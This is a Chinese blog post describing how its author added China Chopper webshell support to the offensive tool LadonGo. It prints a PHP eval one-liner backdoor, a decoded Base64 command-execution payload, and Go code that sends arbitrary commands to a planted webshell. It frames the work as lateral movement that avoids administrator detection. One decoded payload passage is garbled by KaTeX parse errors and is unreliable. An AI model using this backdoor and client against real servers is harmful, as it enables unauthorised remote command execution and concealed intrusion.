LadonGo实现菜刀连接webshell一句话执行cmd代码

背景

最近VPS被人D比较卡,有时候M都不定连得上,或者连上了也难代理出来,所以需要一个命令行下连接内网WEBSHELL执行命令的工具,当然这个功能Ladon早有了。主要是因为在Linux下横向渗透连接内网其它机器执行命令,GO版还没有,所以先给LadonGo添加PHP一句话的连接功能,其它webshell有空再加。

PS:其实主要是另一个原因,好像M在某个LNX环境下有问题,兼容性非常差有个BUG,NC或代理工具等可连网程序通过M执行后经常容易僵尸进程,出此意外得重启M或重启系统才行,而出现僵尸进程时又还显示网络连接时,很容易被管理员发现,所以代理等连网程序能不用就不用。

菜刀PHP一句话

<?php @eval($_POST[tom])?>

连接执行代码

通过Post提交tom参数,可执行PHP代码,如tom=phpinfo();
LadonGo实现菜刀连接webshell一句话执行cmd代码当然也可以简单粗暴的执行cmd命令,如tom=system(whoami);
LadonGo实现菜刀连接webshell一句话执行cmd代码但是这样过于明显,会直接暴露我们执行的命令,所以最好做个加密

菜刀一句话抓包

使用菜刀原版或K8飞刀的菜刀模式连接PHP一句话执行命令
LadonGo实现菜刀连接webshell一句话执行cmd代码
K8飞刀的菜刀选项连接PHP一句话,抓包内容如下:

tom=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXVyImd2hvYW1pJmVjaG8gW1NdJmNkJmVjaG8gW0Vd

可以看到提交的包使用了URL编码和Base64编码,想知道菜刀如何通讯执行CMD命令或者说有无后门,我们就得将其解密。几年前我曾发过抓过狗菜刀的后门,和此文章同理。

验证数据包

K8飞刀-HackIE模块可测试提交抓到的包,看其是否能正常工作
LadonGo实现菜刀连接webshell一句话执行cmd代码

URL编码解密

打开K8飞刀–编码模块(第3个图标)–粘贴抓包数据–复制需要解密的内容–右键编码转换–URL编码–URL编码解密
LadonGo实现菜刀连接webshell一句话执行cmd代码

Base64编码解密z1

K8飞刀–右键选中Z1后面内容—编码转换–Base64编码–Base64编码解密
LadonGo实现菜刀连接webshell一句话执行cmd代码

Base64编码解密z2

LadonGo实现菜刀连接webshell一句话执行cmd代码

明文结果

LadonGo实现菜刀连接webshell一句话执行cmd代码完全解密后,我们发现整段代码执行命令参数在z2,执行cmd的post包直接替换z2参数中的whoami再转成base64编码即可实现菜刀连接PHP一句话执行CMD的功能。

tom=@eval(base64_decode(KaTeX parse error: Expected 'EOF', got '&' at position 13: _POST[z0]));&̲z0=@ini_set("di…p=base64_decode( P O S T [ " z 1 " ] ) ; _POST["z1"]); P​OST["z1"]);s=base64_decode( P O S T [ " z 2 " ] ) ; _POST["z2"]); P​OST["z2"]);d=dirname( S E R V E R [ " S C R I P T F I L E N A M E " ] ) ; _SERVER["SCRIPT_FILENAME"]); S​ERVER["SCRIPTF​ILENAME"]);c=substr(KaTeX parse error: Can't use function '\"' in math mode at position 17: …,0,1)=="/"?"-c \̲"̲{s}"":"/c “{KaTeX parse error: Expected 'EOF', got '}' at position 2: s}̲\"";r=”{KaTeX parse error: Expected 'EOF', got '}' at position 2: p}̲ {c}";@system(KaTeX parse error: Expected 'EOF', got '&' at position 7: r." 2>&̲1",ret);print (KaTeX parse error: Expected '}', got 'EOF' at end of input: ret!=0)?" ret={ret}
“:”";;echo("|<-");die();&z1=Y21k&z2=cd /d “C:\phpStudy\PHPTutorial\WWW”&whoami&echo [S]&cd&echo [E]

Go连接PHP一句话

package rexec
//Ladon Scanner for golang
//Author: k8gege
//K8Blog: http://k8gege.org/Ladon
//Github: https://github.com/k8gege/LadonGo
import (
_“compress/gzip”
“encoding/base64”
“fmt”
“io/ioutil”
“net/http”
“regexp”
“strings”
)
var PhpShellHelp = func () {
fmt.Println(“Usage: Ladon PhpShell url pwd cmd”)
fmt.Println(“Example: Ladon PhpShell http://192.168.1.8/1.php pass whoami”)
}

func PhpShellExec(url,pwd,cmdline string) {
payload := “echo ‘’;&”+cmdline+"&echo ‘’;"
encodeString := base64.StdEncoding.EncodeToString([]byte(payload))
data :=pwd+=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=
req, _ := http.NewRequest(“POST”, url, strings.NewReader(data+encodeString))
req.Header.Set(“User-Agent”, “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36”)
req.Header.Set(“Connection”, “keep-alive”)
req.Header.Set(“Content-Type”, “application/x-www-form-urlencoded”)
req.Header.Set(“Accept-Encoding”, “gzip,deflate”)
resp, err := (&http.Client{}).Do(req)
if err != nil {
fmt.Println(“error”)
}
body, err := ioutil.ReadAll(resp.Body)
//fmt.Println(string(body))
reg := regexp.MustCompile(->\|(?s:(.*?))\|<-)
if reg == nil {
fmt.Println(“regex error”)
return
}
str := string(body)
result := reg.FindAllStringSubmatch(str,-1)
for _, text := range result {
fmt.Println(text[1])
}
}

LadonGo连接

Ladon phpshell http://192.168.1.8/1.php k8 whoami
LadonGo实现菜刀连接webshell一句话执行cmd代码

Ladon连接

062 WebShell远程执行命令(非交互式)

Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

下载

https://github.com/k8gege/Ladon
https://github.com/k8gege/LadonGo

上一篇:python – Reportlab:来自页面的数据的标题


下一篇:渗透技巧-Ladon利用SNMP协议探测存活主机/操作系统版本原理与实现